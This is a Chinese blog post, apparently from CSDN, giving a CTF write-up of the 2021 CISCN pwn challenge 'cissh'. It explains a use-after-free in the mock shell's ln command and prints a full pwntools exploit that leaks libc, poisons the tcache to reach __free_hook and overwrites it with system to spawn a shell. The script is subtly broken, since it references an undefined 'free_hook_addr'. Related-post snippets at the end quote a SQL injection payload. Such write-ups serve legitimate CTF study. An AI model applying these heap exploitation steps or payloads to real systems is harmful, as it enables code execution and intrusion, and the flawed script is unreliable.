2021 ciscn day2 pwn cissh

最新推荐文章于 2024-04-08 22:24:31 发布
原创 最新推荐文章于 2024-04-08 22:24:31 发布 · 266 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

这篇博客探讨了一段包含C++结构体、指针操作和复杂逻辑的代码,揭示了如何通过输入操作触发内存漏洞,特别是UAF(Use-After-Free)。作者展示了如何利用这个漏洞来执行任意命令,最终通过填充Tcache并篡改`__free_hook`来实现代码执行。博客中包含了详细的漏洞利用步骤和exploit代码。

在这里插入图片描述
保护都健在。

在这里插入图片描述
庞大的C++以及复杂的结构体注定了这道题的思路就只能是连猜带蒙。

刚进来简简单单几行
在这里插入图片描述但是旁边的函数条告诉我事情并不是那么简单。

这几行里面首先是一个welcome,没啥说的。
然后看起来是定义了一个manager的结构体,然后下一行是通过结构体得到了一个__shared_ptr_access一个指针。

manager结构体里面也确实有一个那个名字的指针
在这里插入图片描述
指针再进去是一个函数,函数里面就又是一大堆乱七八糟。

在这里插入图片描述

你会发现有个函数多次出现

在这里插入图片描述然后再怎么样就不知道了,那我们回去看看下面的主逻辑程序。

在这里插入图片描述有个输出有个输入,然后再执行execute。

在这里插入图片描述然后就又是一堆。

逻辑分析的清清楚楚是万万做不到的,仅仅是大概发现
在这里插入图片描述
从输入里取了个啥然后跟traits取出来的比对,然后大概是执行的样子。

找到traits里面有啥。

在这里插入图片描述
有个函数表,那么我们就猜测就是执行类似于linux命令的代码而已。

程序中存在 ln 操作可以软链接一个文件,但是源文件删除后 ln 后的内容仍然存在,通过盲测触发了一个 double free 报错

这意味着文件“b”还在使用文件“a”的数据指针,存在 UAF

有了 UAF 之后就直接填满 Tcache 后利用 unsortedbin 泄露出 libc_base,再修改 tcache 的 next 指针为__free_hook,两次申请后得到__free_hook,劫持__free_hook就好啦。

exp

from pwn import *

context.log_level = "debug"

r = process("./cissh")

libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.31-0ubuntu9.2_amd64/libc.so.6")

def touch(name):
    r.sendlineafter("\x1B[31m$ \x1B[m", "touch " + name)

def vi(name, content):
    r.sendlineafter("\x1B[31m$ \x1B[m", "vi " + name)
    r.sendline(content)

def cat(name):
    r.sendlineafter("\x1B[31m$ \x1B[m", "cat " + name)

def ln(name1, name2):
    r.sendlineafter("\x1B[31m$ \x1B[m", "ln " + name1 + " " + name2)

def rm(name):
    r.sendlineafter("\x1B[31m$ \x1B[m", "rm " + name)

for i in range(8):
    name = 'a' + str(i)
    touch(name)
    vi(name, str(i) * 0x100)
    
ln('b', 'b')
ln('c', 'c')

for i in range(8):
    name = 'a' + str(i)
    rm(name)

cat('b')
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
print "libc_base = " + hex(libc_base)

vi('c', p64(free_hook_addr))
touch('d')
vi('d', '/bin/sh\x00' * (0x100 // 8))
touch('e')
vi('e', p64(system_addr) * (0x100 // 8))
rm('d')
    
r.interactive()
Gitlab CI/CD 中使用 ssh-key,登录远程主机部署,执行远程主机的特定脚本
知无涯
05-22 5947
在开发流水线,完成部署作业时,有时需要在流水线构建环境中下载其他项目的代码,并修改推送。也可能将构建物传输到一个远程主机上,或者登录到远程主机执行一段部署脚本。都是要使用以下这段作业来完成。当然首先需要构建免密通道。
ssh 命令_gitlab配置ci自动执行ssh构建命令
weixin_39805529的博客
11-30 1229
前言gitlab提供了免费的ci功能,可以持续集成,通过简单的配置,我们能用ci调用ssh,在远程服务器执行命令。比如重启容器之类的简单任务配置找到项目的Settings -> CI/CD->Variables,添加一个名为SSH_PRIVATE_KEY的变量,内容为你的ssh 私匙,确保能通过该私匙登陆你的ssh服务器然后编辑你项目的.gitlab-ci.yml配置文件job1: ...
pwn.college使用ssh连接desktop
Falling_Asteroid的博客
01-09 1335
ASU CSE365: Introduction to Cybersecurity - CS自学指南 (csdiy.wiki)连接其实不需要使用linux,powershell也可以。
基于Docker构建CI/CD工具链(五)使用ssh命令自动化部署
最新发布
IT
04-08 892
没有自动化部署便没有自动化测试。负载的部署可能需要专门的环境管理软件,是一个可循环执行的部署过程。在自动化部署之前的资源回收是指在进行新版本或更新的部署之前,对之前版本所占用的资源进行清理和回收的过程。这个过程的目的是确保新部署的应用程序不会与旧版本的应用程序发生冲突或资源竞争,同时也可以释放之前版本所占用的资源,提高资源利用率和效率。:灰度发布是一种逐步放大风险的部署策略,通过逐步将新版本应用程序部署到一小部分用户或服务器上,并观察其性能和稳定性,如果没有问题,则逐步扩大部署范围,直到完全替换旧版本。
乱七八糟的pwn入门(二)——1.fd
Z_Pathon的博客
08-06 812
审题 环境配好了,要开始做第一道题了,好激动。让我们打开pwnable.kr,看第一道题。 第一题的题目如下: 小学养成的好习惯,先审题。可以看到,题目上问,linux的“file descriptor”是啥? 是啥?俺也不知道,俺也不想问。这个时候先查资料有点无聊,又看到最下面给了一行命令: ssh fd@pwnable.kr -p2222 ...
精选资源
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
2021 ciscn 线上 pwn lonelywolf
yongbaoii的博客
08-30 362
显然是全开。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_hook,来getshell。 但问题就是怎么来得到.
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 1122
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
2021 ciscn 华中赛区分区赛 pwn note
yongbaoii的博客
09-02 511
libc 2.31 保护是都拉上的。 刚开始有个花指令,通过一定的调整,再反汇编,就得到了正确的结果。 可以看到除了必要的初始化setbuf之外还将4050的地方清空了。 后面我们会看到4050就是存放地址的地方。 add 看一下content的输入 很明显的off by one。 整体结构还是比较清晰的,最多申请三个chunk。 free 清理的很干净。 show show也是正常泄露。 很明显的off by one,我们的常规思路也就是overlap或者unlink。 因为这里泄露不了基地址,所以我
CISCN 2020 Final Day2 pwn3思路分享 .pdf
09-05
CISCN 2020 Final Day2 pwn3思路分享》 本文主要探讨的是在CISCN 2020网络安全大赛第二天的pwn3挑战中的解题思路,涉及的是利用漏洞进行安全对抗的技术。该挑战的核心在于对二进制程序的深入理解和巧妙利用,以...
pwn|软件安全相关问题学习笔记
柷敔的博客
04-16 1736
软件安全相关问题比较琐碎,很多东西一时间记住了但是之后又忘掉了,因此以此文来荟萃各种零零散散的知识点,以备不虞。
centos7 ssh gitlab自动构建 CI/CD 免密登录
u014520797的专栏
09-06 2793
环境背景:现有A,B两台服务器。A有gitlab,B是部署环境,需要在A环境上执行shell脚本,shell脚本中包含ssh roo@*.*.*.*等等, 此时需要ssh 免密登录。 1、 在A上执行:ssh-keygen -t rsa 一切默认,不用输入密码,生成两个文件: /root/.ssh/id_rsa /root/.ssh/id_rsa.pub...
[Tools]Pwn中用于远程交互的库函数总结
車鈊的博客
04-19 4337
Pwn中用于远程交互的库函数总结 在比赛当中经常会与端口应用交互的场景, 首先是PWN库的安装和使用, 参考资料:pwntools — pwntools 4.9.0dev documentation 安装 pip install --upgrade pwntools 导入 from pwn import * 简单IO函数 进程创建 p = process('/bin/sh') # 还可以在已经建立的连接,如IP连接和SSH连接上创建进程 # 关闭进程 p.close() 远程连接主机端口 host =
2021CISCN writeup
读万卷书,行万里路。
05-16 1095
2021CISCN writeup 1.1 easy_sql 进行手动测试,发现可以进行报错注入。Payload 为: ') AND updatexml(1, concat(0x7e, (database()), 0x7e), 1)-- 尝试读取数据库表的表名,发现information关键字被过滤,猜了一下表名为 fl4g、flag,最后确定表名为 flag。 使用 join 爆出字段名。 select*from (select * from flag as a join flag b)c sele
pwntools初体验
公众号shadow sock7
02-22 2981
Python 2.7.12 (default, Sep 28 2016, 18:41:32) [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.38)] on darwin Type “help”, “copyright”, “credits” or “license” for more information. >>> from pwn
Linux PWN从入门到熟练
墨痕诉清风的博客
07-19 2034
最近在复习pwn的一些知识。主要涉及到当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈中执行,而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。本文主要通过练习题的方式讲述如何寻找gadgets,如何利用现有的工具来加速自己的pwn的效率。Gadgets的类型和难度也逐步变化。下面带来手把手教你linux pwn。让你的pwn技术从入门到熟练。练习题的难度逐步加大。
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1545
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
使用Travis-ci自动SSH部署vue代码
weixin_34029680的博客
02-21 738
本文摘自使用Travis-ci自动SSH部署代码和使用 travis 自动部署 vuejs 项目 1. 从手动部署到自动部署 在整个代码部署的道路上,我经历了手动部署到shell半自动部署再到现在的Travis自动部署。 1.1 石器时代 - 手动部署 很早很早之前,我采用完全手动的方式部署代码: 这个过程中我需要,先在本地编写并调试代码然后上传到Git服务器上,再手动SSH登录机器通过git ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值